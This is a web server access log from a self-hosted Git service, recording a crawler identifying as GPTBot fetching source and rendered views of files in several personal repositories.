"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/assets/images/honeywell-logo.svg" -[17/Feb/2026:15:38:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/assets/images/honeywell-logo.svg" -[17/Feb/2026:15:38:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/assets/images/honeywell-logo.svg" -[17/Feb/2026:15:38:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/assets/images/honeywell-logo.svg" -[17/Feb/2026:15:38:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom1.png?display=rendered" [Client 74.7.227.38] [Length 10867] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom1.png" -[17/Feb/2026:15:38:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom5.png?display=rendered" [Client 74.7.227.38] [Length 10859] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom5.png" -[17/Feb/2026:15:38:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom1.png?display=rendered" [Client 74.7.227.38] [Length 10865] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom1.png" -[17/Feb/2026:15:38:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom3.png?display=rendered" [Client 74.7.227.38] [Length 10864] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom3.png" -[17/Feb/2026:15:38:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom6.png?display=rendered" [Client 74.7.227.38] [Length 10862] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom6.png" -[17/Feb/2026:15:38:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom1.png?display=rendered" [Client 74.7.227.38] [Length 10861] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom1.png" -[17/Feb/2026:15:38:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom2.png?display=rendered" [Client 74.7.227.38] [Length 10868] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom2.png" -[17/Feb/2026:15:38:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom6.png?display=rendered" [Client 74.7.227.38] [Length 10869] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom6.png" -[17/Feb/2026:15:38:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates/favicon.ico?display=rendered" [Client 74.7.227.38] [Length 10877] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates/favicon.ico" -[17/Feb/2026:15:38:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/calculator.py?display=rendered" [Client 74.7.227.38] [Length 10981] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/calculator.py" -[17/Feb/2026:15:38:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=.Backup%2fhtml%2fstatus.json" [Client 74.7.227.38] [Length 19764] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/status.json" -[17/Feb/2026:15:38:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/README.md?display=source" [Client 74.7.227.38] [Length 11757] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/README.md" -[17/Feb/2026:15:38:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/README.md?display=source" [Client 74.7.227.38] [Length 11758] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/README.md" -[17/Feb/2026:15:38:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/README.md?display=rendered" [Client 74.7.227.38] [Length 11322] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/README.md" -[17/Feb/2026:15:38:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/README.md?display=rendered" [Client 74.7.227.38] [Length 11321] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/README.md" -[17/Feb/2026:15:38:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Program.cs?display=source" [Client 74.7.227.38] [Length 11343] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Program.cs" -[17/Feb/2026:15:38:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 12567] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/docker-compose.yml" -[17/Feb/2026:15:38:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10832] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/docker-compose.yml" -[17/Feb/2026:15:38:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/update_status.py?display=source" [Client 74.7.227.38] [Length 12935] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/update_status.py" -[17/Feb/2026:15:38:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10895] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/docker-compose.yml" -[17/Feb/2026:15:38:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10865] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/docker-compose.yml" -[17/Feb/2026:15:38:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10805] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/docker-compose.yml" -[17/Feb/2026:15:38:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 11831] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/docker-compose.yml" -[17/Feb/2026:15:38:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10894] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/docker-compose.yml" -[17/Feb/2026:15:38:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/update_status.py?display=rendered" [Client 74.7.227.38] [Length 10808] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/update_status.py" -[17/Feb/2026:15:38:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 12597] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/docker-compose.yml" -[17/Feb/2026:15:38:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/About.tsx?display=rendered" [Client 74.7.227.38] [Length 10908] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/About.tsx" -[17/Feb/2026:15:38:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/About.tsx?display=source" [Client 74.7.227.38] [Length 13937] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/About.tsx" -[17/Feb/2026:15:38:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Header.tsx?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Header.tsx" -[17/Feb/2026:15:38:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Hero.tsx?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Hero.tsx" -[17/Feb/2026:15:38:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Header.tsx?display=source" [Client 74.7.227.38] [Length 14823] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Header.tsx" -[17/Feb/2026:15:38:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Contact.tsx?display=rendered" [Client 74.7.227.38] [Length 10911] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Contact.tsx" -[17/Feb/2026:15:38:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Footer.tsx?display=rendered" [Client 74.7.227.38] [Length 10906] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Footer.tsx" -[17/Feb/2026:15:38:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Hero.tsx?display=source" [Client 74.7.227.38] [Length 13885] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Hero.tsx" -[17/Feb/2026:15:38:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Services.tsx?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Services.tsx" -[17/Feb/2026:15:38:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/ChatBot.tsx?display=source" [Client 74.7.227.38] [Length 15554] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/ChatBot.tsx" -[17/Feb/2026:15:38:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Footer.tsx?display=source" [Client 74.7.227.38] [Length 14206] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Footer.tsx" -[17/Feb/2026:15:38:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Services.tsx?display=source" [Client 74.7.227.38] [Length 14663] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Services.tsx" -[17/Feb/2026:15:38:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Contact.tsx?display=source" [Client 74.7.227.38] [Length 16480] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Contact.tsx" -[17/Feb/2026:15:38:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/ChatBot.tsx?display=rendered" [Client 74.7.227.38] [Length 10909] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/ChatBot.tsx" -[17/Feb/2026:15:38:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 11860] [Gzip 3.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/docker-compose.yml" -[17/Feb/2026:15:38:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__init__.py" [Client 74.7.227.38] [Length 13137] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher" -[17/Feb/2026:15:38:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__init__.py" [Client 74.7.227.38] [Length 13107] [Gzip 4.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher" -[17/Feb/2026:15:38:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/update_status.py?display=source" [Client 74.7.227.38] [Length 12963] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/update_status.py" -[17/Feb/2026:15:38:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10862] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/docker-compose.yml" -[17/Feb/2026:15:38:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/update_status.py?display=rendered" [Client 74.7.227.38] [Length 10835] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/update_status.py" -[17/Feb/2026:15:38:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/mail_contact.py?display=rendered" [Client 74.7.227.38] [Length 10860] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/mail_contact.py" -[17/Feb/2026:15:38:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 12597] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/docker-compose.yml" -[17/Feb/2026:15:38:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/mail_contact.py?display=source" [Client 74.7.227.38] [Length 15653] [Gzip 4.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/mail_contact.py" -[17/Feb/2026:15:38:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 12473] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/docker-compose.yml" -[17/Feb/2026:15:38:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/App.tsx?display=rendered" [Client 74.7.227.38] [Length 10866] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/App.tsx" 